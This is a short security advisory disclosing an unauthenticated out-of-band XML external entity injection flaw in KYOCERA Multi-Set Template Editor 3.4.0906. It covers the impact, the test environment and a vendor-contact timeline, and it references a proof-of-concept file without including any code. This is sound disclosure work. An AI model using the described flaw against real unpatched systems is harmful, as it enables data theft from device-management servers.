关键信息 Advisory ID: ZSL-2018-5459 Title: KYOCERA Multi-Set Template Editor 3.4 Out-Of-Band XML External Entity Injection Type: Local/Remote Impact: Exposure of System Information, Exposure of Sensitive Information, DoS Risk: (4/5) Release Date: 07.04.2018 Summary KYOCERA Net Admin is Kyocera's unified device management software that simplifies the management of up to 10,000 devices. Vulnerability Description An unauthenticated XML External Entity (XXE) injection vulnerability in version 3.4.0906 allows arbitrary data disclosure and retrieval through an out-of-band channel attack when input is passed to the Multi-Set Template Editor. Affected Version 3.4.0906 Tested On Microsoft Windows 7 Professional SP1 (EN) Apache Tomcat/8.5.15 Vendor Status [28.03.2018] Vulnerability discovered. [28.03.2018] Vendor contacted. [06.04.2018] No response from the vendor. [07.04.2018] Public security advisory released. PoC kyocera_xxe.txt References 1. exploit-db 2. X-Force IBM 3. CxSecurity 4. Packetstorm